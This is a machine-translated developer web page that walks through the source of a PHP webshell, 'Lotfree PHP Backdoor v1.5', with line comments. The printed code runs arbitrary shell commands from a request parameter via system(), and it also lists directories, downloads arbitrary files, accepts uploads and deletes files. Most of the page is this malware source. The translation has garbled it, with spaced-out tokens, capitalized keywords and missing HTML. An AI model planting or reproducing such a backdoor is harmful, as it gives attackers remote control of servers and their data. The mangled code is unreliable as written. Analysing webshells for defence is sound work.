Home > Developer > PHP

Explanation of PHP webshell files

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
Explanation of PHP webshell files

PHP Backdoor Version 1.5 is a php Backdoor program compiled by sirius_black/lotfree team. here, we will perform a simple analysis on it and take notes for learning php, the command executed by the backdoor depends on the user's permissions when installing the web server and php. if it is an administrator, various operating system commands can be executed.

Below is a comment on a backdoor program


  3. Function good_link ($ link)
  4. {
  5. $ Link = ereg_replace ("/+", "/", $ link );
  6. $ Link = ereg_replace ("/[^/(..)] +/\. \.", "/", $ link );
  7. $ Link = ereg_replace ("/+", "/", $ link );
  8. If (! Strncmp ($ link, "./", 2) & strlen ($ link)> 2) $ link = substr ($ link, 2 );
  9. If ($ link = "") $ link = ".";
  10. Return $ link;
  11. }
  12. // $ _ REQUEST is used to obtain the data submitted to this file.
  13. $ Dir = isset ($ _ REQUEST ['dir'])? $ _ REQUEST ['dir']: "."; // if no dir is defined, use the default value "."
  14. $ Dir = good_link ($ dir );
  15. $ Rep = opendir ($ dir); // open the path handle specified by dir
  16. Chdir ($ dir); // switch to the directory specified by dir
  17. If (isset ($ _ REQUEST ["down"]) & $ _ REQUEST ["down"]! = "") // If down is defined
  18. {
  19. Header ("Content-Type: application/octet-stream ");
  20. Header ("Content-Length:". filesize ($ _ REQUEST ["down"]);
  21. Header ("Content-Disposition: attachment; filename =". basename ($ _ REQUEST ["down"]);
  22. Readfile ($ _ REQUEST ["down"]); // read the file to the buffer zone
  23. Exit ();
  24. }
  25. ?>

  27. Lotfree php Backdoor v1.5, easy to trace yeetrack.com



  31. Echo "the current absolute path is:". Getcwd ()."
    \ N "; // Obtain the current absolute path
  32. Echo"Dir = '$ dir'
    \ N ";
  33. Echo "current directory, file list!

    \ N ";
  34. // If the command to be executed has been entered
  35. If (isset ($ _ REQUEST ['cmd']) & $ _ REQUEST ['cmd']! = "")
  36. {
  37. Echo"
    \ N ";
  38. System ($ _ REQUEST ['cmd']); // execute the entered command on the server and display the execution result
  39. Echo"
    40. \ N ";
  40. }
  41. // If a file has been uploaded
  42. If (isset ($ _ FILES ["fic"] ["name"]) & isset ($ _ POST ["MAX_FILE_SIZE"]) // Obtain The post file, save to current directory
  43. {
  44. If ($ _ FILES ["fic"] ["size"] <$ _ POST ["MAX_FILE_SIZE"]) // determines whether the file meets the size specifications
  45. {
  46. If (move_uploaded_file ($ _ FILES ["fic"] ["tmp_name"], good_link (". /". $ _ FILES ["fic"] ["name"]) // Save the temporary file to the current directory
  47. {
  48. Echo "the file is successfully saved". good_link ("./". $ _ FILES ["fic"] ["name"]). "!
    \ N ";
  49. }
  50. Else echo "file Upload failed:". $ _ FILES ["fic"] ["error"]."
    \ N ";
  51. }
  52. Else echo "File too large (the File size exceeds the limit )!
    \ N ";
  53. }
  54. If (isset ($ _ REQUEST ['rm ']) & $ _ REQUEST ['rm']! = "") // If rm is defined, the specified file is deleted.
  55. {
  56. If (unlink ($ _ REQUEST ['rm ']) // unlink is a php file deletion function.
  57. Echo "successfully deleted". $ _ REQUEST ['rm ']. "!
    \ N ";
  58. Else echo "failed to delete the file
    \ N ";
  59. }
  60. ?>





  69. $ T_dir = array ();
  70. $ T_file = array ();
  71. $ I _dir = 0;
  72. $ I _file = 0;
  73. // Input the directory file before reading it cyclically and place it in t_dir and t_file.
  74. While ($ x = readdir ($ rep ))
  75. {
  76. If (is_dir ($ x) // if the directory is currently being processed
  77. $ T_dir [$ I _dir ++] = $ x;
  78. Else // if the file is currently being processed
  79. $ T_file [$ I _file ++] = $ x;
  80. }
  81. Closedir ($ rep); // Close the directory handle opened by opendir
  82. While (1) // enter the directory and file of the current path in a loop
  83. {
  84. ?>

  87. // $ _ SERVER ['php _ SELF '] get the current PHP script file name
  88. If ($ y = each ($ t_file ))
  89. {
  90. If ($ y ["key"] % 2 = 0) // if the current processing is key
  91. Echo "bgcolor = 'lightgreen'> \ n ";
  92. Else // if the current process is value, that is, the file. This file is displayed and a download link is provided.
  93. Echo "> \ n ";
  94. Echo "". $ y ["value"]. "\ n ";
  95. }
  96. Else echo "> \ n ";
  97. ?>

  100. If ($ y)
  101. {
  102. // If it is a file, provide the following link to delete the file
  103. If ($ y ["key"] % 2 = 0) echo "bgcolor = 'lightgreen '";
  104. Echo ">Del";
  105. }
  106. Else echo "> \ n ";
  107. ?>

  110. If (! $ X &&! $ Y)
  111. Break;
  112. }
  113. ?>

  116. If ($ x = each ($ t_dir ))
  117. {
  118. $ Name = $ x ["value"]; // Obtain the directory name in the t_dir array
  119. If ($ name = '.'){}
  120. Elseif ($ name = '..') echo "UP (parent directory)

    \ N "; // displays an UP link to read the list of files in the parent directory.
  121. Else
  122. Echo "". $ name. "\ n ";
  123. }
  124. ?>
  		125.




  128. ? Dir = "> revenirau repertoire d 'Origine





  131. Upload files to the current directory on the server:

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
ldap explanation dom explanation ftp explanation wsdl explanation mysql explanation ssl explanation zip list of files
Related Article
Use Lua to implement PHP's Var_dump () function _lua

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More